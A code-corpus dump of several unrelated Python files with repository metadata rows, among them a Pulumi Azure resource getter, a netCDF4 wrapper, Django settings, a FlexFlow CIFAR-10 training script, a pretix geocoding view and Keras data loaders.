                raise TypeError("Expected argument '{}' to be a {}".format(arg_name, expected.__name__))
            pulumi.set(__self__, arg_name, value)

    @property
    @pulumi.getter
    def endpoint(self) -> Optional[str]:
        """Endpoint of the created account"""
        return pulumi.get(self, "endpoint")

    @property
    @pulumi.getter
    def etag(self) -> Optional[str]:
        """Entity Tag"""
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """Type of cognitive service account."""
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """The location of the resource"""
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """The name of the created account"""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """Gets the status of the cognitive services account at the time the operation was called."""
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter
    def sku(self) -> Optional['outputs.SkuResponse']:
        """The SKU of the cognitive services account."""
        return pulumi.get(self, "sku")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Gets or sets a list of key value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """Resource type"""
        return pulumi.get(self, "type")
class AwaitableGetCognitiveServicesAccountResult(GetCognitiveServicesAccountResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # __await__ must be a generator function; the unreachable yield
        # below exists only to make it one.
        if False:
            yield self
        field_names = ('endpoint', 'etag', 'kind', 'location', 'name',
                       'provisioning_state', 'sku', 'tags', 'type')
        # Re-wrap this awaitable as a plain result object, copying every field.
        return GetCognitiveServicesAccountResult(
            **{field: getattr(self, field) for field in field_names})
def get_cognitive_services_account(account_name: Optional[str] = None,
                                   resource_group_name: Optional[str] = None,
                                   opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetCognitiveServicesAccountResult:
    """
    Use this data source to access information about an existing resource.

    :param str account_name: The name of the cognitive services account within the specified resource group. Cognitive Services account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
    :param str resource_group_name: The name of the resource group within the user's subscription.
    """
    __args__ = {
        'accountName': account_name,
        'resourceGroupName': resource_group_name,
    }
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider and copy every field of the typed result into an
    # awaitable wrapper.
    __ret__ = pulumi.runtime.invoke('azure-nextgen:cognitiveservices/v20160201preview:getCognitiveServicesAccount', __args__, opts=opts, typ=GetCognitiveServicesAccountResult).value
    field_names = ('endpoint', 'etag', 'kind', 'location', 'name',
                   'provisioning_state', 'sku', 'tags', 'type')
    return AwaitableGetCognitiveServicesAccountResult(
        **{field: getattr(__ret__, field) for field in field_names})
| 37.317647 | 312 | 0.64959 |
2259f597dffc0f6c955c10db971d41fb48ee5bd4 | 1,503 | py | Python | kid_readout/measurement/io/easync.py | danielflanigan/kid_readout | 07202090d468669200cab78297122880c1c03e87 | [
"BSD-2-Clause"
] | 1 | 2015-05-21T20:57:39.000Z | 2015-05-21T20:57:39.000Z | kid_readout/utils/easync.py | braddober/kid_readout | 1917960c761663227fa5b74fff34e38a03b80b4d | [
"BSD-2-Clause"
] | null | null | null | kid_readout/utils/easync.py | braddober/kid_readout | 1917960c761663227fa5b74fff34e38a03b80b4d | [
"BSD-2-Clause"
] | null | null | null | """
easync.py - easier access to netCDF4 files
"""
import netCDF4
class EasyGroup(object):
    """Attribute-style wrapper around a netCDF4 group.

    Every sub-group, variable and dimension of the wrapped group is exposed
    as a Python attribute (dimensions get a ``dim_`` prefix) so that nested
    data can be reached with dot notation instead of dictionary lookups.
    Sub-groups are wrapped recursively.  Existing attributes are never
    overwritten; a warning is printed and the name is skipped instead.

    NOTE: this module uses Python 2 print statements.
    """
    def __repr__(self):
        return "EasyNC: %s %s" % (self._filename,self.group.path)
    def __str__(self):
        return self.__repr__()
    def __init__(self,group,filename):
        # filename is kept only so __repr__ can show where the data came from
        self._filename = filename
        self.group = group
        self.groups = group.groups
        self.variables = group.variables
        self.dimensions = group.dimensions
        # Expose each sub-group as an attribute, wrapped in its own EasyGroup.
        for gname in group.groups.keys():
            if hasattr(self,gname):
                print self,"already has an attribute",gname,"skipping"
                continue
            self.__setattr__(gname,EasyGroup(group.groups[gname],self._filename))
        # Expose each variable directly (no wrapping needed).
        for vname in group.variables.keys():
            if hasattr(self,vname):
                print self,"already has an attribute",vname,"skipping"
                continue
            self.__setattr__(vname,group.variables[vname])
        # Dimensions are prefixed with "dim_" to avoid clashing with
        # same-named variables (a common netCDF convention).
        for dname in group.dimensions.keys():
            dimname = "dim_" + dname
            if hasattr(self,dimname):
                print self,"already has an attribute",dimname,"skipping"
                continue
            self.__setattr__(dimname,group.dimensions[dname])
def EasyNetCDF4(*args,**kwargs):
    """Open a netCDF4 Dataset and return it wrapped in an EasyGroup.

    All positional/keyword arguments are forwarded to ``netCDF4.Dataset``.
    The wrapper additionally exposes the dataset's ``close`` and ``sync``
    methods so it can be used like the underlying Dataset.
    """
    dataset = netCDF4.Dataset(*args, **kwargs)
    # The filename is the first positional argument, or the 'filename' kwarg.
    filename = args[0] if len(args) > 0 else kwargs['filename']
    wrapper = EasyGroup(dataset, filename)
    wrapper.close = dataset.close
    wrapper.sync = dataset.sync
    return wrapper
013311bc9ab25f701b48f2903b1d44a7fceb261a | 4,489 | py | Python | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | 1 | 2021-04-02T13:59:20.000Z | 2021-04-02T13:59:20.000Z | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | null | null | null | platzigram/settings.py | chegrofelix/insta-clone | b0adb0050f8c9d5f9e40e152b65d9d68b60a3d74 | [
"MIT"
] | null | null | null | """
Django settings for platzigram project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import django_heroku
from pathlib import Path
from decouple import config,Csv
import cloudinary
import cloudinary.uploader
import cloudinary.api
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=False, cast=bool)
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
#Django Apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#Local Apps
'posts',
'users',
'cloudinary'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'platzigram.middleware.ProfileCompletionMiddleware',
]
ROOT_URLCONF = 'platzigram.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# Esto lo agregue
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'platzigram.wsgi.application'
cloudinary.config(
cloud_name = config('cloud_name'),
api_key = config('api_key'),
api_secret = config('api_secret')
)
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
#development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'), )
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
# Media para desarrollo
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Login
LOGIN_URL = '/users/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/users/login/'
# Configure Django App for Heroku.
django_heroku.settings(locals())
| 25.219101 | 91 | 0.692136 |
85a915ac57e82e13bc28c2b056ee878dc638aea0 | 2,167 | py | Python | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | examples/python/pytorch/cifar10_cnn.py | sdalton1/FlexFlow | a08386df098aaa23195ba15af2d0e1c88ecc399c | [
"Apache-2.0"
] | null | null | null | from flexflow.core import *
from flexflow.keras.datasets import cifar10
from flexflow.torch.model import PyTorchModel
#from accuracy import ModelAccuracy
def top_level_task():
    """Train a CNN (deserialized from "cnn.ff") on CIFAR-10 with FlexFlow and report throughput."""
    ffconfig = FFConfig()
    print("Python API batchSize(%d) workersPerNodes(%d) numNodes(%d)" %(ffconfig.batch_size, ffconfig.workers_per_node, ffconfig.num_nodes))
    ffmodel = FFModel(ffconfig)
    # NCHW input tensor: batch of 3-channel 32x32 images.
    dims_input = [ffconfig.batch_size, 3, 32, 32]
    input_tensor = ffmodel.create_tensor(dims_input, DataType.DT_FLOAT)
    # Rebuild the network from the serialized PyTorch model description.
    # NOTE(review): the same tensor is passed twice — presumably "cnn.ff"
    # declares two inputs; confirm against the model file.
    torch_model = PyTorchModel("cnn.ff")
    output_tensors = torch_model.apply(ffmodel, [input_tensor, input_tensor])
    t = ffmodel.softmax(output_tensors[0])
    ffoptimizer = SGDOptimizer(ffmodel, 0.01)
    ffmodel.optimizer = ffoptimizer
    ffmodel.compile(loss_type=LossType.LOSS_SPARSE_CATEGORICAL_CROSSENTROPY, metrics=[MetricsType.METRICS_ACCURACY, MetricsType.METRICS_SPARSE_CATEGORICAL_CROSSENTROPY])
    label_tensor = ffmodel.label_tensor
    # Load the first 10000 CIFAR-10 samples; scale pixels to [0, 1].
    num_samples = 10000
    (x_train, y_train), (x_test, y_test) = cifar10.load_data(num_samples)
    x_train = x_train.astype('float32')
    x_train /= 255
    full_input_array = x_train
    y_train = y_train.astype('int32')
    full_label_array = y_train
    dataloader_input = ffmodel.create_data_loader(input_tensor, full_input_array)
    dataloader_label = ffmodel.create_data_loader(label_tensor, full_label_array)
    # The loader may adjust the sample count (e.g. to a multiple of the batch size).
    num_samples = dataloader_input.get_num_samples()
    ffmodel.init_layers()
    # Debug output: list the model's layers and look one up by name.
    layers = ffmodel.get_layers()
    for layer in layers:
        print(layers[layer].name)
    layer = ffmodel.get_layer_by_name("relu_1")
    print(layer)
    epochs = ffconfig.epochs
    ts_start = ffconfig.get_current_time()
    ffmodel.fit(x=dataloader_input, y=dataloader_label, epochs=epochs)
    ts_end = ffconfig.get_current_time()
    # Timer values are scaled by 1e-6 to seconds (printed with an "s" suffix).
    run_time = 1e-6 * (ts_end - ts_start);
    print("epochs %d, ELAPSED TIME = %.4fs, THROUGHPUT = %.2f samples/s\n" %(epochs, run_time, num_samples * epochs / run_time));
    # perf_metrics = ffmodel.get_perf_metrics()
    # accuracy = perf_metrics.get_accuracy()
    # if accuracy < ModelAccuracy.CIFAR10_CNN.value:
    #   assert 0, 'Check Accuracy'
if __name__ == "__main__":
    print("cifar10 cnn")
    top_level_task()
| 30.957143 | 167 | 0.760037 |
a69fb6b4fa82c626ecffa034c6b7149eca785a14 | 3,685 | py | Python | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 1,248 | 2015-04-24T13:32:06.000Z | 2022-03-29T07:01:36.000Z | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 2,113 | 2015-02-18T18:58:16.000Z | 2022-03-31T11:12:32.000Z | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 453 | 2015-05-13T09:29:06.000Z | 2022-03-24T13:39:16.000Z | #
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
import logging
from urllib.parse import quote
import requests
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.cache import cache
from django.http import JsonResponse
from django.views.generic.base import View
from pretix.base.settings import GlobalSettingsObject
logger = logging.getLogger(__name__)
class GeoCodeView(LoginRequiredMixin, View):
    """Resolve a free-text location query (?q=...) to coordinates.

    Uses the OpenCage geocoder when an API key is configured, otherwise
    MapQuest.  Responses are cached for six hours.  Failures and missing API
    keys yield ``{"success": false, "results": []}`` with HTTP 200 instead of
    an error page, so the frontend can degrade gracefully.
    """

    def get(self, request, *args, **kwargs):
        q = self.request.GET.get('q')
        cache_key = 'geocode:{}'.format(q)
        cd = cache.get(cache_key)
        # Explicit None check: an empty result list is a valid cached value.
        # The previous truthiness check (`if cd:`) treated cached [] as a
        # miss and re-queried the geocoder on every request.
        if cd is not None:
            return JsonResponse({
                'success': True,
                'results': cd
            }, status=200)

        gs = GlobalSettingsObject()
        try:
            if gs.settings.opencagedata_apikey:
                res = self._use_opencage(q)
            elif gs.settings.mapquest_apikey:
                res = self._use_mapquest(q)
            else:
                # No geocoding backend configured.
                return JsonResponse({
                    'success': False,
                    'results': []
                }, status=200)
        except IOError:
            # requests exceptions (including timeouts) derive from IOError.
            logger.exception("Geocoding failed")
            return JsonResponse({
                'success': False,
                'results': []
            }, status=200)

        cache.set(cache_key, res, timeout=3600 * 6)
        return JsonResponse({
            'success': True,
            'results': res
        }, status=200)

    def _use_opencage(self, q):
        """Query the OpenCage forward geocoder and normalize its results."""
        gs = GlobalSettingsObject()
        r = requests.get(
            'https://api.opencagedata.com/geocode/v1/json?q={}&key={}'.format(
                quote(q), gs.settings.opencagedata_apikey
            ),
            timeout=10,  # avoid hanging the request thread on a slow upstream
        )
        r.raise_for_status()
        d = r.json()
        res = [
            {
                'formatted': result['formatted'],
                'lat': result['geometry']['lat'],
                'lon': result['geometry']['lng'],
            } for result in d['results']
        ]
        return res

    def _use_mapquest(self, q):
        """Query the MapQuest geocoder and normalize its results.

        MapQuest does not echo a formatted address, so the original query
        string is used as the 'formatted' value.
        """
        gs = GlobalSettingsObject()
        r = requests.get(
            'https://www.mapquestapi.com/geocoding/v1/address?location={}&key={}'.format(
                quote(q), gs.settings.mapquest_apikey
            ),
            timeout=10,  # avoid hanging the request thread on a slow upstream
        )
        r.raise_for_status()
        d = r.json()
        res = [
            {
                'formatted': q,
                'lat': result['locations'][0]['latLng']['lat'],
                'lon': result['locations'][0]['latLng']['lng'],
            } for result in d['results']
        ]
        return res
| 34.439252 | 118 | 0.59403 |
e0dc4f835734d7ee6335cf3f669e2b6a13c04e98 | 2,327 | py | Python | project_utils.py | KieranXWang/HRS | 3999cd036ee9da59f4d82619bd540e93d5258f7c | [
"MIT"
] | 5 | 2019-09-05T15:18:52.000Z | 2022-03-28T08:15:47.000Z | project_utils.py | VictoriaWSY/HRS | eb7061e225b3e647dc266a91fc473e0d98f3ea4e | [
"MIT"
] | 1 | 2021-07-26T13:05:49.000Z | 2021-07-26T13:05:49.000Z | project_utils.py | VictoriaWSY/HRS | eb7061e225b3e647dc266a91fc473e0d98f3ea4e | [
"MIT"
] | 6 | 2019-09-18T02:11:12.000Z | 2022-03-11T08:45:03.000Z | import numpy as np
from keras.datasets import cifar10, mnist
from keras.utils import np_utils
def load_cifar_data(one_hot=True, scale1=True):
    """Load CIFAR-10.

    Args:
        one_hot: encode labels as 10-way one-hot vectors; otherwise flatten
            them to 1-D integer arrays.
        scale1: convert images to float32 and scale pixel values to [0, 1].

    Returns:
        X_train, X_test, Y_train, Y_test
    """
    (x_tr, y_tr), (x_te, y_te) = cifar10.load_data()
    if one_hot:
        y_tr = np_utils.to_categorical(y_tr, 10)
        y_te = np_utils.to_categorical(y_te, 10)
    else:
        # Keras returns labels with shape (n, 1); flatten to (n,).
        y_tr = np.reshape(y_tr, (y_tr.shape[0],))
        y_te = np.reshape(y_te, (y_te.shape[0],))
    if scale1:
        x_tr = x_tr.astype('float32') / 255
        x_te = x_te.astype('float32') / 255
    return x_tr, x_te, y_tr, y_te
def load_mnist_data(one_hot=True, scale1=True):
    """Load MNIST with an explicit single-channel image axis.

    Keras delivers MNIST as uint8 arrays in [0, 255] with non-one-hot labels;
    this helper reshapes images to (n, 28, 28, 1) and optionally one-hot
    encodes the labels and scales pixels to [0, 1].

    Returns:
        X_train, X_test, Y_train, Y_test
    """
    (x_tr, y_tr), (x_te, y_te) = mnist.load_data()
    # Add the trailing channel axis expected by conv layers.
    x_tr = np.reshape(x_tr, (x_tr.shape[0], x_tr.shape[1], x_tr.shape[2], 1))
    x_te = np.reshape(x_te, (x_te.shape[0], x_te.shape[1], x_te.shape[2], 1))
    if one_hot:
        y_tr = np_utils.to_categorical(y_tr, 10)
        y_te = np_utils.to_categorical(y_te, 10)
    if scale1:
        x_tr = x_tr.astype('float32') / 255
        x_te = x_te.astype('float32') / 255
    return x_tr, x_te, y_tr, y_te
def get_data(dataset, scale1=True, one_hot=False, percentage=None):
    """Load a dataset, optionally truncating the training split.

    Args:
        dataset: 'CIFAR' or 'MNIST'.
        scale1: scale pixel values to [0, 1] (see the loaders).
        one_hot: one-hot encode the labels.
        percentage: if given, keep only this fraction of the training samples.

    Returns:
        [X_train, X_test, Y_train, Y_test]

    Raises:
        ValueError: if `dataset` is not recognised.  (Previously an unknown
        name fell through and raised a confusing NameError on return.)
    """
    if dataset == 'CIFAR':
        X_train, X_test, Y_train, Y_test = load_cifar_data(scale1=scale1, one_hot=one_hot)
    elif dataset == 'MNIST':
        X_train, X_test, Y_train, Y_test = load_mnist_data(scale1=scale1, one_hot=one_hot)
    else:
        raise ValueError("Unknown dataset %r, expected 'CIFAR' or 'MNIST'" % (dataset,))
    # Optionally keep only the first `percentage` of the training split.
    if percentage:
        use_samples = int(X_train.shape[0] * percentage)
        X_train = X_train[:use_samples]
        Y_train = Y_train[:use_samples]
    return [X_train, X_test, Y_train, Y_test]
def get_dimensions(dataset):
    """Return the image dimensions of a supported dataset.

    Args:
        dataset: 'CIFAR' or 'MNIST'.

    Returns:
        [height, width, channels]

    Raises:
        ValueError: if `dataset` is not recognised.  (Previously an unknown
        name silently returned None.)
    """
    if dataset == 'CIFAR':
        return [32, 32, 3]
    if dataset == 'MNIST':
        return [28, 28, 1]
    raise ValueError("Unknown dataset %r, expected 'CIFAR' or 'MNIST'" % (dataset,))
| 28.728395 | 92 | 0.628706 |
3e4c82fa2f273b6624e4f2d09c2b801124c54aae | 2,500 | py | Python | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | 1 | 2021-02-25T08:41:51.000Z | 2021-02-25T08:41:51.000Z | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | null | null | null | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from typing import List, Union
import numpy as np
import pandas as pd
from zvt.api import AdjustType, get_kdata, get_kdata_schema
from zvt.contract import EntityMixin, IntervalLevel
from zvt.domain import Stock
from zvt.factors import TechnicalFactor, Transformer, Accumulator
def get_ref_vector(entity_id, end, window=100, level=IntervalLevel.LEVEL_1DAY, entity_schema=Stock):
    """Build a (window, 2) array of [close, volume] for the last `window` bars.

    Bars are fetched up to `end` in descending timestamp order, so row 0 holds
    the most recent bar.
    """
    data_schema = get_kdata_schema(entity_schema.__name__, level=level)
    kdata = get_kdata(entity_id=entity_id, level=level, end_timestamp=end,
                      order=data_schema.timestamp.desc(), limit=window,
                      columns=['close', 'volume'])
    # Pre-allocate and fill column-wise; requires exactly `window` rows.
    ref_vector = np.zeros((window, 2))
    ref_vector[:, 0] = kdata['close']
    ref_vector[:, 1] = kdata['volume']
    return ref_vector
class SimilarityFactor(TechnicalFactor):
    """Technical factor that carries a reference [close, volume] vector.

    The reference vector is built once from `entity_id`'s last `window` bars
    ending at `end`; all other parameters are forwarded unchanged to
    TechnicalFactor.
    """
    # NOTE(review): `columns` uses a mutable list as a default argument; it is
    # only read here and passed through, but callers should not mutate it.
    def __init__(self, entity_schema: EntityMixin = Stock, provider: str = None, entity_provider: str = None,
                 entity_ids: List[str] = None, exchanges: List[str] = None, codes: List[str] = None,
                 the_timestamp: Union[str, pd.Timestamp] = None, start_timestamp: Union[str, pd.Timestamp] = None,
                 end_timestamp: Union[str, pd.Timestamp] = None,
                 columns: List = ['id', 'entity_id', 'timestamp', 'level', 'open', 'close', 'high', 'low'],
                 filters: List = None, order: object = None, limit: int = None,
                 level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY, category_field: str = 'entity_id',
                 time_field: str = 'timestamp', computing_window: int = None, keep_all_timestamp: bool = False,
                 fill_method: str = 'ffill', effective_number: int = None, transformer: Transformer = None,
                 accumulator: Accumulator = None, need_persist: bool = False, dry_run: bool = False,
                 adjust_type: Union[AdjustType, str] = None, entity_id='stock_sz_000338', end='2020-01-01',
                 window=100) -> None:
        # Build the reference vector before the base class initializes
        # (base __init__ may trigger data loading/computation).
        self.ref_vector = get_ref_vector(entity_id=entity_id, end=end, window=window)
        super().__init__(entity_schema, provider, entity_provider, entity_ids, exchanges, codes, the_timestamp,
                         start_timestamp, end_timestamp, columns, filters, order, limit, level, category_field,
                         time_field, computing_window, keep_all_timestamp, fill_method, effective_number, transformer,
                         accumulator, need_persist, dry_run, adjust_type)
9b531db7c6e6b8fea84b02e97414e77dda5a2a51 | 4,572 | py | Python | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | null | null | null | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | 8 | 2020-03-24T17:17:06.000Z | 2022-03-11T23:53:25.000Z | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | null | null | null | import gluonnlp as nlp
import Levenshtein
import mxnet as mx
import numpy as np
from ocr.utils.encoder_decoder import decode_char
class SequenceGenerator:
    """Denoise an OCR'd sentence by re-ranking beam-search candidates.

    Candidates produced by `sampler` are filtered through a cascade of
    heuristics: vocabulary score, edit distance to the input sentence,
    token count, and language-model perplexity.
    """

    def __init__(self, sampler, language_model, vocab, ctx_nlp, tokenizer=nlp.data.SacreMosesTokenizer(), detokenizer=nlp.data.SacreMosesDetokenizer()):
        # NOTE(review): the default tokenizer/detokenizer instances are
        # created at definition time and shared across SequenceGenerator
        # instances; this looks intentional (they appear stateless) — confirm.
        self.sampler = sampler
        self.language_model = language_model
        self.ctx_nlp = ctx_nlp
        self.vocab = vocab
        self.tokenizer = tokenizer
        self.detokenizer = detokenizer

    def generate_sequences(self, inputs, begin_states, sentence):
        """Return the best denoised version of `sentence`.

        Args:
            inputs: seed input for the beam-search sampler.
            begin_states: initial decoder states for the sampler.
            sentence: the raw OCR sentence being corrected.
        """
        samples, scores, valid_lengths = self.sampler(inputs, begin_states)
        samples = samples[0].asnumpy()
        scores = scores[0].asnumpy()
        valid_lengths = valid_lengths[0].asnumpy()
        max_score = -10e20

        # Heuristic #1:
        # If every token of the input sentence is a frequent in-vocabulary
        # word (or a known contraction), keep the sentence unchanged.
        sentence_tokenized = [i.replace("&quot;", '"').replace("&apos;","'").replace("&amp;", "&") for i in self.tokenizer(sentence)]
        sentence_correct = True
        for token in sentence_tokenized:
            if (token not in self.vocab or self.vocab[token] > 400000) and token.lower() not in ["don't", "doesn't", "can't", "won't", "ain't", "couldn't", "i'd", "you'd", "he's", "she's", "it's", "i've", "you've", "she'd"]:
                sentence_correct = False
                break
        if sentence_correct:
            return sentence

        # Heuristic #2:
        # Keep the candidates with the most in-vocabulary words; penalize
        # out-of-vocabulary words that do not start with a capital letter
        # (capitalized unknowns are likely proper names).
        best_tokens = []
        for i, sample in enumerate(samples):
            tokens = decode_char(sample[:valid_lengths[i]])
            tokens = [tok.replace("&quot;", '"').replace("&apos;","'").replace("&amp;", "&") for tok in self.tokenizer(tokens)]
            score = 0
            for t in tokens:
                if not ((t in self.vocab and self.vocab[t] < 450000) or (len(t) > 0 and t.istitle())):
                    score -= 1
            if score == max_score:
                best_tokens.append(tokens)
            elif score > max_score:
                max_score = score
                best_tokens = [tokens]

        # Heuristic #3:
        # Among those, keep the candidates with the smallest edit distance
        # to the original sentence.
        # Bug fix: the module is imported as `Levenshtein`; the previous
        # `leven.levenshtein(...)` raised a NameError at runtime.
        best_dist = 1000
        output_tokens = best_tokens[0]
        best_tokens_ = []
        for tokens in best_tokens:
            dist = Levenshtein.distance(sentence, ' '.join(self.detokenizer(tokens)))
            if dist < best_dist:
                best_dist = dist
                best_tokens_ = [tokens]
            elif dist == best_dist:
                best_tokens_.append(tokens)

        # Heuristic #4:
        # Prefer candidates with the fewest tokens, to avoid split-up
        # composed words.
        min_len = 10e20
        best_tokens__ = []
        for tokens in best_tokens_:
            if len(tokens) < min_len:
                min_len = len(tokens)
                best_tokens__ = [tokens]
            elif len(tokens) == min_len:
                best_tokens__.append(tokens)

        # Heuristic #5:
        # Break remaining ties with language-model perplexity.
        best_ppl = 10e20
        for tokens in best_tokens__:
            if len(tokens) > 1:
                token_ids = self.vocab[tokens]
                hidden = self.language_model.begin_state(batch_size=1, func=mx.nd.zeros, ctx=self.ctx_nlp)
                output, _ = self.language_model(mx.nd.array(token_ids).expand_dims(axis=1).as_in_context(self.ctx_nlp), hidden)
                output = output.softmax()
                # Sum the negative log-likelihood of each next token.
                nll = 0
                for i in range(1, len(token_ids)):
                    nll += -output[i-1][0][token_ids[i]].log()
                ppl = (nll/len(token_ids)).exp()
                if ppl < best_ppl:
                    output_tokens = tokens
                    best_ppl = ppl
        output = ' '.join(self.detokenizer(output_tokens))

        # Heuristic #6:
        # Trim trailing artifacts: the correction should not be much longer
        # than the original sentence.
        if len(output) > len(sentence) + 10:
            output = output[:len(sentence)+2]
        return output
04966c67237f3424e389b5e61b569f254418acb2 | 5,091 | py | Python | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/mrp/protobuf/NowPlayingClient.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
